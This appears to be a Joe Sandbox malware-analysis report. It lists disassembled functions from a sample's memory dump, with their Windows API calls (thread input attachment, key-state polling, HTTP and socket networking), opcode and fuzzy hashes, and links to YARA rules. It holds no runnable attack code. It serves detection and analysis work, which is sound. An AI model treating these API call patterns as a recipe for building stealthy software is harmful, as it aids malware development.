                                                                                                                                                                              • API String ID: 1704125052-3381328864
                                                                                                                                                                              • Opcode ID: ec48a76ddadd25e3dd186eea87036d3296dd506521610ea3416df76186fe436f
                                                                                                                                                                              • Instruction ID: fbf24216ad5191ff708643d250120eb16bfde321beb3ed8ab13f4b4099dd6a73
                                                                                                                                                                              • Opcode Fuzzy Hash: ec48a76ddadd25e3dd186eea87036d3296dd506521610ea3416df76186fe436f
                                                                                                                                                                              • Instruction Fuzzy Hash: 55113AB7248782B9FA042A32EC47CA77BACDF12324B200017F910A61E3FB6968034568
                                                                                                                                                                              Function 004FB05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 004FB137
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ArraySafeVartype
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1725837607-0
                                                                                                                                                                              • Opcode ID: 3fa4ed3cbd474476d6b0b363e96d5deb90925c894d7d9e525b088033fab80f73
                                                                                                                                                                              • Instruction ID: 57cd0b816b5e0bc12e5ba722ddc3879b39282fb8c90e61c8b38e82fc502ad7f5
                                                                                                                                                                              • Opcode Fuzzy Hash: 3fa4ed3cbd474476d6b0b363e96d5deb90925c894d7d9e525b088033fab80f73
                                                                                                                                                                              • Instruction Fuzzy Hash: 2CC18C75A0021ADFDB00CF98D485BBEB7B4EF0A315F24406BEA05E7341C778A945CB99
                                                                                                                                                                              Function 004F4A5B Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004F4A7D
                                                                                                                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4A91
                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 004F4A98
                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4AA7
                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 004F4AB9
                                                                                                                                                                              • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4AD2
                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4AE4
                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4B29
                                                                                                                                                                              • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4B3E
                                                                                                                                                                              • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4B49
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2156557900-0
                                                                                                                                                                              • Opcode ID: a7ccf54273b95c7dec131c3a2ce62714609035bd08b430cced3abde060099737
                                                                                                                                                                              • Instruction ID: c95591f01db98676c533d18cd764f11934ad7000baa8604abed98d45d52a0733
                                                                                                                                                                              • Opcode Fuzzy Hash: a7ccf54273b95c7dec131c3a2ce62714609035bd08b430cced3abde060099737
                                                                                                                                                                              • Instruction Fuzzy Hash: 27318671510208ABDB109F54EC85B7B777DABA0321F144006FB05D7360DBB8ED88BB65
                                                                                                                                                                              Function 0052EC19 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClientRect.USER32(?), ref: 0052EC32
                                                                                                                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0052EC49
                                                                                                                                                                              • GetWindowDC.USER32(?), ref: 0052EC55
                                                                                                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0052EC64
                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 0052EC76
                                                                                                                                                                              • GetSysColor.USER32(00000005), ref: 0052EC94
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 272304278-0
                                                                                                                                                                              • Opcode ID: a4dcb27ad6934269a9aab284289d72bb8d453bec713e7eb479178664e8435393
                                                                                                                                                                              • Instruction ID: 8d51493b739c068758ab3b43c55b6ea8d897eb510573e06dc3247bff80d946fc
                                                                                                                                                                              • Opcode Fuzzy Hash: a4dcb27ad6934269a9aab284289d72bb8d453bec713e7eb479178664e8435393
                                                                                                                                                                              • Instruction Fuzzy Hash: 8D215C31500204AFDB61ABB4FC4AFAA7B75FB15321F104225FA26A52E1CB310959EF21
                                                                                                                                                                              Function 004ED978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • EnumChildWindows.USER32(?,004EDD46), ref: 004EDC86
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ChildEnumWindows
                                                                                                                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                              • API String ID: 3555792229-1603158881
                                                                                                                                                                              • Opcode ID: 8c66b40f43f6960125517fca6b48954a4538203502461c4579c2c3a06dfae1e8
                                                                                                                                                                              • Instruction ID: f9c3f43dda08b18c0baeefa39467f65c19fc5c36e19d9d25b033bcd47158152f
                                                                                                                                                                              • Opcode Fuzzy Hash: 8c66b40f43f6960125517fca6b48954a4538203502461c4579c2c3a06dfae1e8
                                                                                                                                                                              • Instruction Fuzzy Hash: 4D91E730E005469ACB08DF62C481BEAFBB5FF14344F54811FD84AA7291DF78694ADBA8
                                                                                                                                                                              Function 004B45A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 004B45F0
                                                                                                                                                                              • CoUninitialize.OLE32(?,00000000), ref: 004B4695
                                                                                                                                                                              • UnregisterHotKey.USER32(?), ref: 004B47BD
                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00525936
                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0052599D
                                                                                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 005259CA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                              • String ID: close all
                                                                                                                                                                              • API String ID: 469580280-3243417748
                                                                                                                                                                              • Opcode ID: 63a3952b61ca0df313f742975d77801bcbd5b1f1735748accb3c18ab306017c7
                                                                                                                                                                              • Instruction ID: 2cc9d06b9744403f3f5a6cf5c3e1b87b778d6ca98ccbc569fffbc1c2db5a62d9
                                                                                                                                                                              • Opcode Fuzzy Hash: 63a3952b61ca0df313f742975d77801bcbd5b1f1735748accb3c18ab306017c7
                                                                                                                                                                              • Instruction Fuzzy Hash: F2915034600502CFC715EF15D995BA9F7B4FF15704F1042AEE40A572A2DB38AE56DF28
                                                                                                                                                                              Function 004CC24A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 004CC2D2
                                                                                                                                                                                • Part of subcall function 004CC697: GetClientRect.USER32(?,?), ref: 004CC6C0
                                                                                                                                                                                • Part of subcall function 004CC697: GetWindowRect.USER32(?,?), ref: 004CC701
                                                                                                                                                                                • Part of subcall function 004CC697: ScreenToClient.USER32(?,?), ref: 004CC729
                                                                                                                                                                              • GetDC.USER32 ref: 0052E006
                                                                                                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0052E019
                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0052E027
                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0052E03C
                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 0052E044
                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0052E0CF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                              • String ID: U
                                                                                                                                                                              • API String ID: 4009187628-3372436214
                                                                                                                                                                              • Opcode ID: b186ca03c0f9ca16ea1d5c4d165928d0beb3a6dcc837b83bc9421270753cfc88
                                                                                                                                                                              • Instruction ID: 3165d0094ba9449658545ced893d91afc25b77eaf20b33feeda247b9ac305270
                                                                                                                                                                              • Opcode Fuzzy Hash: b186ca03c0f9ca16ea1d5c4d165928d0beb3a6dcc837b83bc9421270753cfc88
                                                                                                                                                                              • Instruction Fuzzy Hash: D2710435900208DFCF21CF64E889AEA7FB5FF5A310F14426AED595A2E5C7318C42EB65
                                                                                                                                                                              Function 0051EAA6 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                                                                                                                                                • Part of subcall function 004CB736: GetCursorPos.USER32(000000FF), ref: 004CB749
                                                                                                                                                                                • Part of subcall function 004CB736: ScreenToClient.USER32(00000000,000000FF), ref: 004CB766
                                                                                                                                                                                • Part of subcall function 004CB736: GetAsyncKeyState.USER32(00000001), ref: 004CB78B
                                                                                                                                                                                • Part of subcall function 004CB736: GetAsyncKeyState.USER32(00000002), ref: 004CB799
                                                                                                                                                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0051EB0E
                                                                                                                                                                              • ImageList_EndDrag.COMCTL32 ref: 0051EB14
                                                                                                                                                                              • ReleaseCapture.USER32 ref: 0051EB1A
                                                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 0051EBC2
                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0051EBD5
                                                                                                                                                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0051ECAE
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                              • API String ID: 1924731296-2107944366
                                                                                                                                                                              • Opcode ID: 09c729010f389b953d6608cb23acddc6a316eb8af69d0687758b454ff4546651
                                                                                                                                                                              • Instruction ID: ea5f7689e7f70341610a9a98ba5a90c045e73b94c545303159e06a1716119b27
                                                                                                                                                                              • Opcode Fuzzy Hash: 09c729010f389b953d6608cb23acddc6a316eb8af69d0687758b454ff4546651
                                                                                                                                                                              • Instruction Fuzzy Hash: 44517A31104304AFE700EF24DC96FAA7BF5BB88708F10492DF955962A2DB749948EB66
                                                                                                                                                                              Function 00504C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00504C5E
                                                                                                                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00504C8A
                                                                                                                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00504CCC
                                                                                                                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00504CE1
                                                                                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00504CEE
                                                                                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00504D1E
                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00504D65
                                                                                                                                                                                • Part of subcall function 005056A9: GetLastError.KERNEL32(?,?,00504A2B,00000000,00000000,00000001), ref: 005056BE
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1241431887-3916222277
                                                                                                                                                                              • Opcode ID: 96617d934b5a76efa6363a4d62ba7228faac34eb7c73931d629bd851c866b714
                                                                                                                                                                              • Instruction ID: cd456a6d29502bfeca12e4c47583f02712e3c9e25360fafe0e85f1c624227d45
                                                                                                                                                                              • Opcode Fuzzy Hash: 96617d934b5a76efa6363a4d62ba7228faac34eb7c73931d629bd851c866b714
                                                                                                                                                                              • Instruction Fuzzy Hash: 6B414AB2501619BFEB129F60DD89FBF7BACFB48354F10411AFA019A291E7709D449BA0
                                                                                                                                                                              Function 0050BAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0054DBF0), ref: 0050BBA1
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0054DBF0), ref: 0050BBD5
                                                                                                                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0050BD33
                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0050BD5D
                                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000028,?,0054DBF0), ref: 0050BEAD
                                                                                                                                                                              • ProgIDFromCLSID.OLE32(?,?,?,0054DBF0), ref: 0050BEF7
                                                                                                                                                                              • CoTaskMemFree.OLE32(?,?,?,0054DBF0), ref: 0050BF14
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 793797124-0
                                                                                                                                                                              • Opcode ID: f461a9240f4d321e76b7ba47d9ae7c8dd7759e9e4eea1dab05625c658a0da2ff
                                                                                                                                                                              • Instruction ID: ec8af44cef09646718aa249e90420fb4690d9c5e92f184c09d649be6ab9121e9
                                                                                                                                                                              • Opcode Fuzzy Hash: f461a9240f4d321e76b7ba47d9ae7c8dd7759e9e4eea1dab05625c658a0da2ff
                                                                                                                                                                              • Instruction Fuzzy Hash: D8F10A75A00109EFDF14DFA4C884EAEBBB9FF89314F148459F905AB290DB71AE45CB60
                                                                                                                                                                              Function 00509A66 Relevance: 13.7, APIs: 9, Instructions: 247networkCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • select.WSOCK32 ref: 00509B38
                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00509B45
                                                                                                                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00509B6F
                                                                                                                                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00509B90
                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00509B9F
                                                                                                                                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 00509C51
                                                                                                                                                                              • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0054DBF0), ref: 00509C0C
                                                                                                                                                                                • Part of subcall function 004EE0F5: _strlen.LIBCMT ref: 004EE0FF
                                                                                                                                                                                • Part of subcall function 004EE0F5: _memmove.LIBCMT ref: 004EE121
                                                                                                                                                                              • _strlen.LIBCMT ref: 00509CA7
                                                                                                                                                                              • _memmove.LIBCMT ref: 00509D10
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3637404534-0
                                                                                                                                                                              • Opcode ID: 08d71fafb916773159966f33bbcd726301a6bedf88f2079404bda13199fa76a5
                                                                                                                                                                              • Instruction ID: 8c1819c00c2dbb0656e16e3f5a6bafe14125e5cccd21f092fee04a91f6ed647d
                                                                                                                                                                              • Opcode Fuzzy Hash: 08d71fafb916773159966f33bbcd726301a6bedf88f2079404bda13199fa76a5
                                                                                                                                                                              • Instruction Fuzzy Hash: DF81AD32508200ABD714EF25DC85FAFBBB8FB84718F10491EF5558B292DB34D904CBA6
                                                                                                                                                                              Function 0051B14A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0051B204
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InvalidateRect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 634782764-0
                                                                                                                                                                              • Opcode ID: 6b9b93a03c4321cdd9657ab9b2e4dae3baa56b0ef6eabc1bc42f9506efa901ca
                                                                                                                                                                              • Instruction ID: 2d77ae3dbfdecebd70d191f548a5fa879f5dd9d46963d108a75b6b536ef898d7
                                                                                                                                                                              • Opcode Fuzzy Hash: 6b9b93a03c4321cdd9657ab9b2e4dae3baa56b0ef6eabc1bc42f9506efa901ca
                                                                                                                                                                              • Instruction Fuzzy Hash: 5F51AD34640204BEFF209B28CC8AFDE3F65BB16314F204916FA65D61A1C7B1E9D4EB51
                                                                                                                                                                              Function 004CA599 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0052E9EA
                                                                                                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0052EA0B
                                                                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0052EA20
                                                                                                                                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0052EA3D
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0052EA64
                                                                                                                                                                              • DestroyIcon.USER32(00000000,?,?,?,?,?,?,004CA57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0052EA6F
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0052EA8C
                                                                                                                                                                              • DestroyIcon.USER32(00000000,?,?,?,?,?,?,004CA57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0052EA97
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
